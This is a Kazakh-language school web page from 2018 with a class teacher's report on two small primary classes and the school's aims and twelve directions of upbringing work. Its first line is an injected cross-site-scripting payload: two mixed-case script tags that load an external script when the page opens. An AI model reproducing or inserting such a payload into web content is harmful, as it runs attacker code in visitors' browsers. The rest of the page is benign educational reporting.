<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

03.02.2018

3 (үшінші) «А» сыныбында тізім бойынша 2 оқушы оқиды.4 (төртінші) «А» сыныбында да тізім бойынша 2 оқушы оқиды. Сыныпта қазіргі уақытта 3 қыз бала , 1 ұл бала бар,барлық оқушылар толық отбасында тәрбие алып келеді. Әр оқушыда қоғамдық қызметтер бар. Оқушылар оқуға жауапкершілікпен қарайды. Балалар барлық қоғамдық жұмыстарға белсенді қатысады. Сынып ішінде қарым-қатынастары жақсы.Оқу жылының басын мынадай мақсатпен және міндеттермен бастадық:

Мақсаты:

Оқушыларды адамгершілікке, патриоттыққа және мәдениеттілікке тәрбиелей отырып, әлеуметтік жағдайларға бейімделуге қабілетті тұлға қалыптастыру.

Міндеттері:

1.     Еліміздің рәмізін сыйлау,өзінің Отан,жанұя,қоғам алдындағы міндеттерін жете түсінуге тәрбиелеу;

2.     Рухани байыту принциптерін негізге ала отырып,салауатты өмір салтына баулу;

3.     Оқушылардың қоғамдық жұмыстарға бесене қатысуға деген жауапкершілігін арттыру;

Мектептің тәрбие жұмысы мынандай 12 бағыт бойынша жүргізіледі:

1.     Азаматтық – патриоттық, құқықтық және полимәдениеттік тәрбие;

2.     Рухани –адамгершілік тәрбие;

3.     Отбасы тәрбиесі;

4.     Өзін –өзі тану мен өзін-өзі дамыту қажеттілігін қалыптастыру;

5.     Әлеуметтік –мәнді және жеке қасиеттерін қалыптастыру;

6.     Коммуникативті мәдениетті қалыптастыру;

7.     Экологиялық тәрбие;

8.     Эстетикалық тәрбие;

9.     Дене тәрбиесі мен салауатты өмір салтын  және денсаулық қорғаушы ортаны қалыптастыру;

10.         Еңбек  және экономикалық тәрбие;

11.        Кәсіби – шығармашылық тәрбие;

12.        Интеллектуалды мәдениетті дамыту;

Просмотров: 1274

Қосымшалар:



Пікір қосу



Деректерді қолтаңбаға қосу